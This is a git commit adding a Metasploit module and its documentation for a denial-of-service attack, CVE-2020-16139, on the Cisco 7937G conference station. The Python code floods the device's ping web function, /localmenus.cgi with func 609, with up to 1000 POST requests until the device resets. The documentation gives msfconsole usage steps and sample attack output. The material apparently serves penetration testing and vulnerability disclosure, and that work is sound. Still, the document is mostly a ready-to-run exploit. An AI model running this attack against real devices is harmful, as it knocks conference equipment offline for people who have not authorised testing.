Land #13984, add cisco 7937g dos module
This commit is contained in:
commit
5bcdaa50d6
|
@ -0,0 +1,54 @@
|
||||||
|
## Vulnerable Application
|
||||||
|
|
||||||
|
[Cisco 7937G](https://www.cisco.com/c/en/us/support/collaboration-endpoints/unified-ip-conference-station-7937g/model.html) Conference Station.
|
||||||
|
This module has been tested successfully against firmware versions SCCP-1-4-5-5 and SCCP-1-4-5-7.
|
||||||
|
|
||||||
|
### Description
|
||||||
|
|
||||||
|
This module exploits a bug in how the conference station handles executing a ping via its web interface.
|
||||||
|
By repeatedly executing the ping function without clearing out the resulting output,
|
||||||
|
a DoS is caused that will reset the device after a few minutes.
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. Obtain a Cisco 7937G Conference Station.
|
||||||
|
2. Enable Web Access on the device (default configuration).
|
||||||
|
3. Start msfconsole
|
||||||
|
4. Do: `use auxiliary/dos/cisco/cisco_7937g_dos_reboot`
|
||||||
|
5. Do: `set rhost 192.168.1.10`
|
||||||
|
6. Do: `run`
|
||||||
|
7. The conference station should become nonresponsive and then power cycle itself.
|
||||||
|
|
||||||
|
## Options
|
||||||
|
|
||||||
|
No options
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
### Cisco 7937G Running Firmware Version SCCP-1-4-5-7
|
||||||
|
|
||||||
|
```
|
||||||
|
msf5 > use auxiliary/dos/cisco/cisco_7937g_dos_reboot
|
||||||
|
msf5 auxiliary(dos/cisco/cisco_7937g_dos_reboot) > set rhost 192.168.110.209
|
||||||
|
rhost => 192.168.110.209
|
||||||
|
msf5 auxiliary(dos/cisco/cisco_7937g_dos_reboot) > run
|
||||||
|
|
||||||
|
[*] Starting server...
|
||||||
|
[*] 192.168.110.209 - Sending DoS Packets. Stand by.
|
||||||
|
[*] 192.168.110.209 - DoS reset attack completed!
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
```
|
||||||
|
|
||||||
|
### Cisco 7937G Running Firmware Version SCCP-1-4-5-5
|
||||||
|
|
||||||
|
```
|
||||||
|
msf5 > use auxiliary/dos/cisco/cisco_7937g_dos_reboot
|
||||||
|
msf5 auxiliary(dos/cisco/cisco_7937g_dos_reboot) > set rhost 192.168.110.209
|
||||||
|
rhost => 192.168.110.209
|
||||||
|
msf5 auxiliary(dos/cisco/cisco_7937g_dos_reboot) > run
|
||||||
|
|
||||||
|
[*] Starting server...
|
||||||
|
[*] 192.168.110.209 - Sending DoS Packets. Stand by.
|
||||||
|
[*] 192.168.110.209 - DoS reset attack completed!
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
```
|
|
@ -0,0 +1,89 @@
|
||||||
|
#!/usr/bin/env python3
|
||||||
|
# -*- coding: utf-8 -*-
|
||||||
|
|
||||||
|
# standard modules
|
||||||
|
from metasploit import module
|
||||||
|
import logging
|
||||||
|
|
||||||
|
# extra modules
|
||||||
|
requests_missing = False
|
||||||
|
random_missing = False
|
||||||
|
string_missing = False
|
||||||
|
|
||||||
|
try:
|
||||||
|
import requests
|
||||||
|
except ImportError:
|
||||||
|
requests_missing = True
|
||||||
|
try:
|
||||||
|
import random
|
||||||
|
except ImportError:
|
||||||
|
random_missing = True
|
||||||
|
try:
|
||||||
|
import string
|
||||||
|
except ImportError:
|
||||||
|
string_missing = True
|
||||||
|
|
||||||
|
metadata = {
|
||||||
|
'name': 'Cisco 7937G Denial-of-Service Reboot Attack',
|
||||||
|
'description': '''
|
||||||
|
This module exploits a bug in how the conference station handles
|
||||||
|
executing a ping via its web interface. By repeatedly executing
|
||||||
|
the ping function without clearing out the resulting output,
|
||||||
|
a DoS is caused that will reset the device after a few minutes.
|
||||||
|
''',
|
||||||
|
'authors': [
|
||||||
|
'Cody Martin'
|
||||||
|
# Author Homepage: debifrank.github.io
|
||||||
|
# Organization: BlackLanternSecurity
|
||||||
|
# Org. Homepage: BlackLanternSecurity.com
|
||||||
|
],
|
||||||
|
'date': '2020-06-02',
|
||||||
|
'license': 'GPL_LICENSE',
|
||||||
|
'references': [
|
||||||
|
{'type': 'url', 'ref': 'https://blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/'},
|
||||||
|
{'type': 'cve', 'ref': '2020-16139'}
|
||||||
|
],
|
||||||
|
'type': 'dos',
|
||||||
|
'options': {
|
||||||
|
'rhost': {'type': 'address',
|
||||||
|
'description': 'Target address',
|
||||||
|
'required': True,
|
||||||
|
'default': 'None'}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
def run(args):
|
||||||
|
module.LogHandler.setup(msg_prefix='{} - '.format(args['rhost']))
|
||||||
|
if requests_missing:
|
||||||
|
logging.error('Required Python module dependency (requests) is missing.')
|
||||||
|
logging.error('Please execute pip3 install requests.')
|
||||||
|
return
|
||||||
|
if random_missing:
|
||||||
|
logging.error('Required Python module dependency (random) is missing.')
|
||||||
|
logging.error('Please execute pip3 install random.')
|
||||||
|
if string_missing:
|
||||||
|
logging.error('Required Python module dependency (string) is missing.')
|
||||||
|
logging.error('Please execute pip3 install string.')
|
||||||
|
|
||||||
|
url = "http://{}/localmenus.cgi".format(args['rhost'])
|
||||||
|
data = ''.join(random.choice(string.ascii_letters) for i in range(46))
|
||||||
|
payload = {"func": "609", "data": data, "rphl": "1"}
|
||||||
|
logging.info("Sending POST requests triggering the PING function.")
|
||||||
|
logging.info("Device should crash with a DoS shortly...")
|
||||||
|
for i in range(1000):
|
||||||
|
try:
|
||||||
|
r = requests.post(url=url, params=payload, timeout=5)
|
||||||
|
if r.status_code != 200:
|
||||||
|
logging.error("Device doesn't appear to be functioning or web access is not enabled.")
|
||||||
|
return
|
||||||
|
except requests.exceptions.ReadTimeout as e:
|
||||||
|
logging.info('DoS reset attack completed!')
|
||||||
|
return
|
||||||
|
except requests.exceptions.RequestException as e:
|
||||||
|
logging.info('An unexpected exception occurred: ' + str(e))
|
||||||
|
logging.info('The device may be DoS\'d already or not have web access enabled.')
|
||||||
|
return
|
||||||
|
|
||||||
|
|
||||||
|
if __name__ == '__main__':
|
||||||
|
module.run(metadata, run)
|
Loading…
Reference in New Issue